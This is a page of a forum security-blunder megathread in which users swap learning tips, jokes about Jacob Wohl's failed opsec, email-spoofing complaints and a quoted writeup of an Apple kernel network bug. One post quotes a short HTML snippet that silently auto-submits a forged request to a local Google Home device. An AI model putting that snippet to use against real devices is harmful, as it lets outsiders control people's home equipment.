Security Fuckup Megathread - v16.2 - /home/land/security/theatre

The Something Awful Forums > Discussion > Serious Hardware/Software Crap > YOSPOS > Security Fuckup Megathread - v16.2 - /home/land/security/theatre

«‹›178 »

Wasabi the J: Jan 23, 2008; MOM WAS RIGHT

I have sec+ 401 or whatever and after lurking this thread for like five minutes a year or so ago, I felt completely uneducated.

Where do I go to like... Learn this poo poo? I felt like all my training is teaching me how to cram for a test, not how things work.

I understand physical security pretty loving well, thankfully.

# ? Oct 30, 2018 20:42

Adbot: ADBOT LOVES YOU

# ? Jun 8, 2024 17:14

CRIP EATIN BREAD: Jun 24, 2002; Hey stop worrying bout my acting bitch, and worry about your WACK ass music. In the mean time... Eat a hot bowl of Dicks! Ice T; Soiled Meat

you gotta get knee deep into things and get your hands dirty. training can get you started but just going into various certifications wont do you any good.

the same can be said for pretty much every field in the world.

# ? Oct 30, 2018 21:14

spankmeister: Jun 15, 2008

Learn by doing. Do online challenges, participate in CTF's, download vulnerable VM's from vulnhub and try to hack them.

As for trainings, OSCP is good because you basically have to hack into a network.

# ? Oct 30, 2018 21:17

Kuvo: Oct 27, 2008; Blame it on the misfortune of your bark!; Fun Shoe

this count as a security fuckup?

https://news.vice.com/en_us/article/xw9n3q/we-posed-as-100-senators-to-run-ads-on-facebook-facebook-approved-all-of-them

quote:

One of Facebook�s major efforts to add transparency to political advertisements is a required �Paid for by� disclosure at the top of each ad supposedly telling users who is paying for political ads that show up in their news feeds.

But on the eve of the 2018 midterm elections, a VICE News investigation found the �Paid for by� feature is easily manipulated and appears to allow anyone to lie about who is paying for a political ad, or to pose as someone paying for the ad.

To test it, VICE News applied to buy fake ads on behalf of all 100 sitting U.S. senators, including ads �Paid for by� by Mitch McConnell and Chuck Schumer. Facebook�s approvals were bipartisan: All 100 sailed through the system, indicating that just about anyone can buy an ad identified as �Paid for by� by a major U.S. politician.

# ? Oct 30, 2018 21:27

evil_bunnY: Apr 2, 2003

Angela Merkle Tree posted:

browsers are pieces of poo poo and the same-origin policy isn't gonna save you

code:

<body onload="document.forms[0].submit()">
  <iframe name="iframe" width=0 height=0></iframe>
  <form method='POST' enctype='text/plain' target="iframe" action="http://local-google-home-ip">
    <input name='{"json": "value' value='"}'>
  </form>
</body>

Jesus loving Christ why

# ? Oct 30, 2018 21:30

BlankSystemDaemon: Mar 13, 2009

Does Where Did I Leave My Keys?: Lessons from the Juniper Dual EC Incident [pdf] count as a secfuck?

# ? Oct 30, 2018 23:43

BlankSystemDaemon: Mar 13, 2009

And if that's not secfuck, then this is secfuck of the opsec variety.

# ? Oct 30, 2018 23:47

dpkg chopra: Jun 9, 2007; Fast Food Fight; Grimey Drawer

Bank of America spoofs the from address to look like the account owner when sending a payment notification because apparently email being a broken piece poo poo is a feature not a bug

yes I did find this out after replying to that email with a bunch of sensitive client info why do you ask

(like, it�s fine obvs, it just got bounced back but jfc)

# ? Oct 30, 2018 23:48

Subjunctive: Sep 12, 2006; ✨sparkle and shine✨

Ur Getting Fatter posted:

Bank of America spoofs the from address to look like the account owner when sending a payment notification because apparently email being a broken piece poo poo is a feature not a bug

yes I did find this out after replying to that email with a bunch of sensitive client info why do you ask

(like, it�s fine obvs, it just got bounced back but jfc)

you didn�t check the signature?

# ? Oct 30, 2018 23:51

dpkg chopra: Jun 9, 2007; Fast Food Fight; Grimey Drawer

Subjunctive posted:

you didn�t check the signature?

this client has his own lovely email server that doesn�t use tls in tyool 2018

if you mean a regular email signature (�John Doe - CEO of poo poo Co LLC�) he doesn�t use those either.

also I was tired and hungry and wanted to go home and just blindly clicked at the last email of him I could find (the sec fuckup is me)

# ? Oct 30, 2018 23:56

pseudorandom name: May 6, 2007

D. Ebdrup posted:

And if that's not secfuck, then this is secfuck of the opsec variety.

Jacob Wohl aspires to be a security fuckup.

# ? Oct 31, 2018 00:04

anthonypants: May 6, 2007; by Nyc_Tattoo; Dinosaur Gum

pseudorandom name posted:

Jacob Wohl aspires to be a security fuckup.

there's a thread about his whole "ex-mossad" private investigator firm https://twitter.com/AricToler/status/1057352982768074753

kid thought he could trick reverse image search by making black & white photos

# ? Oct 31, 2018 00:13

post hole digger: Mar 21, 2011

D. Ebdrup posted:

And if that's not secfuck, then this is secfuck of the opsec variety.

lol https://securitytrails.com/domain/surefireintelligence.com/history/soa

# ? Oct 31, 2018 00:35

Subjunctive: Sep 12, 2006; ✨sparkle and shine✨

the Surefire thing is incredible

# ? Oct 31, 2018 00:37

post hole digger: Mar 21, 2011

anthonypants posted:

there's a thread about his whole "ex-mossad" private investigator firm https://twitter.com/AricToler/status/1057352982768074753

kid thought he could trick reverse image search by making black & white photos

oh theres a securitytrails link in there too. the funniest thing about the pics to me is ratcheting the filters and contrast up on them so a bunch of ~"High Level Security Executives"~ have pictures that look like theyd be band photos in a TSOL album insert. real normal thing for an Professional Adult to do.

# ? Oct 31, 2018 00:38

pr0digal: Sep 12, 2008; Alan Rickman Overdrive

Ah I see he's following the "don't act like your cover is blown" strategy, let's see if it pays off.

https://twitter.com/JacobAWohl/status/1057377866713751552

Fun fact: the article doesn't have the docs anymore and replaced it with this.

quote:

Earlier today we were given information on accusations against former FBI Director Robert Mueller.

We took the documents down and we are currently investigating these accusations.

There are also very serious allegations against Jacob Wohl.
We are also looking into this.

# ? Oct 31, 2018 01:53

Powered Descent: Jul 13, 2008; We haven't had that spirit here since 1969.

Subjunctive posted:

the Surefire thing is incredible

I wonder if the flashlight company will sue.

# ? Oct 31, 2018 02:02

Munkeymon: Aug 14, 2003; Motherfucker's got an
armor-piercing crowbar! Rigoddamndicu𝜆ous.

the funniest thing is that the number Surefire, the company A Whol totally does not have anything to do with, has/had on their site rings up his mom

# ? Oct 31, 2018 03:24

Lutha Mahtin: Oct 10, 2010; Your brokebrain sin is absolved...go and shitpost no more!

D. Ebdrup posted:

And if that's not secfuck, then this is secfuck of the opsec variety.

this has been my favorite news story of the day

https://www.nbcnews.com/politics/justice-department/mueller-refers-sex-assault-scheme-targeting-him-fbi-investigation-n926301

quote:

Krassenstein and other journalists also pointed to Jacob Wohl, a disgraced hedge fund manager turned pro-Trump conspiracy theorist and Surefire Intelligence, a company connected to him, as being involved with Burkman's alleged plot.

"I gave Burkman a call. I wanted to know who 'Surefire Intelligence' is. That's when he told me about Jacob Wohl," said Krassenstein. "To me, this was all a setup from somebody trying to discredit the media."

Early this morning, Wohl tweeted, "Several media sources tell me that a scandalous story about Mueller is breaking tomorrow. Should be interesting. Stay tuned!"

Reached by direct message on Twitter, Wohl denied having a hand in any plot to pay women making false allegations against Mueller. "I don't have any involvement in any investigations of any kind. I'm not quite that cool," he said.

The allegations still took off as far-right news sites tied to Wohl and known for spreading fake news and disinformation published viral posts. Gateway Pundit, where Wohl is employed as a writer, touted their "exclusive documents" about a "very credible witness."

Wohl declined to comment on his involvement with Surefire Intelligence. However, his email is listed in the domain records for Surefire Intelligence's website and calls to a number listed on the Surefire Intelligence website went to a voicemail message which provided another phone number, listed in public records as belonging to Wohl's mother.

Wohl stopped responding to NBC News after being told Surefire's official phone number redirects to his mother's voicemail.

also

https://twitter.com/lachlan/status/1057368046199816193

finally, jacob wohl is notable for being the youngest person ever to be barred for life from working in the US financial industry. he managed to do this when he was all of nineteen

# ? Oct 31, 2018 03:24

anthonypants: May 6, 2007; by Nyc_Tattoo; Dinosaur Gum

Lutha Mahtin posted:

finally, jacob wohl is notable for being the youngest person ever to be barred for life from working in the US financial industry. he managed to do this when he was all of nineteen

holy poo poo lmao

# ? Oct 31, 2018 03:40

Shame Boy: Mar 2, 2010

Ur Getting Fatter posted:

Bank of America spoofs the from address to look like the account owner when sending a payment notification because apparently email being a broken piece poo poo is a feature not a bug

yes I did find this out after replying to that email with a bunch of sensitive client info why do you ask

(like, it�s fine obvs, it just got bounced back but jfc)

does it actually spoof the from address header or does it show up as "from us on behalf of whoever" because that's a separate header that does that and it's how you're "supposed" to do it. barely anyone ever uses it though, generally for dumb reasons - at my last job it was because "spoofing it from their actual address is more personalized and people like it!!!"

do people also like having their email blackholed constantly because we're sending mail from domains we don't own, huh? do they motherfucker? gently caress you

# ? Oct 31, 2018 04:04

Kuvo: Oct 27, 2008; Blame it on the misfortune of your bark!; Fun Shoe

you forgot the part where he registered the website domain under his own name

https://twitter.com/HoarseWisperer/status/1057340080107470848

or the part where he used his own google account

https://twitter.com/SpeedflyChris/status/1057365216214822913

or the part where he accused mueller of the assault on a day where he had an incredibly strong alibi

https://twitter.com/thetomzone/status/1057383937893416962

# ? Oct 31, 2018 04:04

Kuvo: Oct 27, 2008; Blame it on the misfortune of your bark!; Fun Shoe

sorry if this isnt sec fuckup enough but its incredibly funny

# ? Oct 31, 2018 04:05

Midjack: Dec 24, 2007

Kuvo posted:

you forgot the part where he registered the website domain under his own name

https://twitter.com/HoarseWisperer/status/1057340080107470848

or the part where he used his own google account

https://twitter.com/SpeedflyChris/status/1057365216214822913

or the part where he accused mueller of the assault on a day where he had an incredibly strong alibi

https://twitter.com/thetomzone/status/1057383937893416962

lmao at all this but especially the last one

# ? Oct 31, 2018 04:05

anthonypants: May 6, 2007; by Nyc_Tattoo; Dinosaur Gum

Kuvo posted:

sorry if this isnt sec fuckup enough but its incredibly funny

the nfa complaint has even less to do with secfuck but is also incredibly funny https://www.nfa.futures.org/basicnet/CaseDocument.aspx?seqnum=4346

# ? Oct 31, 2018 04:25

Volmarias: Dec 31, 2002; EMAIL... THE INTERNET... SEARCH ENGINES...

quote:

Wohl stopped responding to NBC News after being told Surefire's official phone number redirects to his mother's voicemail.

This will never not be the best part.

# ? Oct 31, 2018 04:30

Lutha Mahtin: Oct 10, 2010; Your brokebrain sin is absolved...go and shitpost no more!

it's pretty funny that nearly every boring journeyman political reporter in the US is now an opsec genius. at least, they're geniuses compared to the bumbling trumpers they report on

# ? Oct 31, 2018 04:50

influx.: Dec 16, 2007; Nice pants!

Lutha Mahtin posted:

security is hard and we're all terrible at it imo

# ? Oct 31, 2018 05:35

Shame Boy: Mar 2, 2010

Volmarias posted:

This will never not be the best part.

dammit mom i told you to pick up the phone if anyone calls and pretend to be my receptionist, ugh i can't wait until i'm old enough to move out!!

# ? Oct 31, 2018 08:16

Agile Vector: May 21, 2007; scrum bored

Shame Boy posted:

dammit mom i told you to pick up the phone if anyone calls and pretend to be my receptionist, ugh i can't wait until i'm old enough to move out!!

*jacob comes shuffling out the bathroom frantically shouting his companys name before collapsing as it goes to voicemail*

# ? Oct 31, 2018 13:14

Stanley Pain: Jun 16, 2001; by Fluffdaddy

a surefire way of getting pwned...

# ? Oct 31, 2018 13:41

Proteus Jones: Feb 28, 2013

https://twitter.com/yoyoha/status/1057424007887286273

# ? Oct 31, 2018 15:18

Pile Of Garbage: May 28, 2007

ok that's probably the line for wohl chat

# ? Oct 31, 2018 15:21

Stymie: Jan 9, 2001; by LITERALLY AN ADMIN

as amusing as this all is, it's going to be mighty embarrassing later when the mueller investigation wraps up without any significant impact on the trump admin

# ? Oct 31, 2018 23:15

Salt Fish: Sep 11, 2003; Cybernetic Crumb

Has anyone worked with CIS before? Do they publish an open set of standards or is it more of a 'buy our services' thing?

# ? Oct 31, 2018 23:39

Dr. Kayak Paddle: May 10, 2006

Salt Fish posted:

Has anyone worked with CIS before? Do they publish an open set of standards or is it more of a 'buy our services' thing?

I use it for reference for some Palo Alto and AWS things. AFAIK you can join and view all of them (the benchmarks) for free.

https://www.cisecurity.org/cybersecurity-tools/
There is a reference of free vs paid things

Dr. Kayak Paddle fucked around with this message at 23:59 on Oct 31, 2018

# ? Oct 31, 2018 23:52

post hole digger: Mar 21, 2011

https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
:thunk:

quote:

This post is about a heap buffer overflow vulnerability which I found in Apple's XNU operating system kernel. I have written a proof-of-concept exploit which can reboot any Mac or iOS device on the same network, without any user interaction. Apple have classified this vulnerability as a remote code execution vulnerability in the kernel, because it may be possible to exploit the buffer overflow to execute arbitrary code in the kernel.

The following operating system versions and devices are vulnerable:

Apple iOS 11 and earlier: all devices (upgrade to iOS 12)
Apple macOS High Sierra, up to and including 10.13.6: all devices (patched in security update 2018-001)
Apple macOS Sierra, up to and including 10.12.6: all devices (patched in security update 2018-005)
Apple OS X El Capitan and earlier: all devices

The vulnerability is a heap buffer overflow in the networking code in the XNU operating system kernel. XNU is used by both iOS and macOS, which is why iPhones, iPads, and Macbooks are all affected. To trigger the vulnerability, an attacker merely needs to send a malicious IP packet to the IP address of the target device. No user interaction is required. The attacker only needs to be connected to the same network as the target device. For example, if you are using the free WiFi in a coffee shop then an attacker can join the same WiFi network and send a malicious packet to your device. (If an attacker is on the same network as you, it is easy for them to discover your device's IP address using nmap.) To make matters worse, the vulnerability is in such a fundamental part of the networking code that anti-virus software will not protect you: I tested the vulnerability on a Mac running McAfee� Endpoint Security for Mac and it made no difference. It also doesn't matter what software you are running on the device - the malicious packet will still trigger the vulnerability even if you don't have any ports open.

# ? Nov 1, 2018 00:03

evil_bunnY: Apr 2, 2003

https://twitter.com/ihackbanme/status/1057811965945376768?s=21

# ? Nov 1, 2018 11:07

Potato Salad: Oct 23, 2014; nobody cares

itt:

-wannabe undercover super information broker whose opsec is worse than a shitling tier highsec EvE corp

-apple being magnificently bad

# ? Nov 1, 2018 16:37

Adbot: ADBOT LOVES YOU

# ? Jun 8, 2024 17:14

Proteus Jones: Feb 28, 2013

https://arstechnica.com/information-technology/2018/11/bluetooth-bugs-bite-millions-of-wi-fi-aps-from-cisco-meraki-and-aruba/

# ? Nov 2, 2018 04:04

The Something Awful Forums > Discussion > Serious Hardware/Software Crap > YOSPOS > Security Fuckup Megathread - v16.2 - /home/land/security/theatre

«‹›178 »